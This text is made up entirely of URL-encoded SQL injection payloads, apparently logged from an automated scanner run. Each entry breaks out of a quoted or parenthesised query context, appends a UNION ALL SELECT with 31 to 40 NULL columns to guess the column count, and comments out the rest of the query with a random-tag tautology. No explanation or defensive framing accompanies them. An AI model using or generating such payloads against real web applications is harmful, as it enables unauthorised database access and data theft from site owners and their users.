1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%288100%3D8100 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%283746%3D3746 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284387%3D4387 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285971%3D5971 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27rAcH%27%3D%27rAcH 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27YyMW%27%3D%27YyMW 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27cKjU%27%3D%27cKjU 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27NZYD%27%3D%27NZYD 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27hjoz%27%3D%27hjoz 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27AfoH%27%3D%27AfoH 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27yESE%27%3D%27yESE 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27xapi%27%3D%27xapi 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27snYf%27%3D%27snYf 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27hNgx%27%3D%27hNgx 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27IJlR%27%3D%27IJlR 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27GloN%27%3D%27GloN 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27CRsy%27%3D%27CRsy 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27pKpV%27%3D%27pKpV 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27AhWV%27%3D%27AhWV 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ihqd%27%3D%27ihqd 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27hLPT%27%3D%27hLPT 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27mihr%27%3D%27mihr 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27QopD%27%3D%27QopD 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27JUml%27%3D%27JUml 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27sglM%27%3D%27sglM 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27mWYA%27%3D%27mWYA 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27wPNi%27%3D%27wPNi 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27nnQN%27%3D%27nnQN 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27jVRL%27%3D%27jVRL 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27umnb%27%3D%27umnb 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27bbJC%27%3D%27bbJC 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27ozlT%27%3D%27ozlT 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27ffsP%27%3D%27ffsP 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27qpVU%27%3D%27qpVU 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27ZqTD%27%3D%27ZqTD 